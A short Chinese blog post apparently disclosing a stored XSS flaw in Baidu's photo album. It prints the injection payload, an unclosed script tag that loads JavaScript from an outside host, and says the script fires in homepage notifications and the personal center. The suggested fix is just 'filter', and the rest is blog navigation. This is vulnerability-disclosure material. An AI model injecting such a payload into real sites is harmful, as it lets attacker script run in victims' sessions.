1.插入不要闭合的代码:<script/src="https://q601333824.duapp.com/3.js" 2.代码存在的位置 3.评论变成了null,但是百度首页有提醒,个人中心也能弹出来 修复方案: 过滤 上一篇: siteserver最新版3.6.4 sql inject 第十蛋 - 网站安全 下一篇: 一次靠运气成分的提权 - 网站安全 - 自学php 本博客所有文章如无特别注明均为原创。 复制或转载请以超链接形式注明转自起风了,原文地址《百度相册存储型XSS漏洞指谁打谁,可对用户留置》
还没有人抢沙发呢~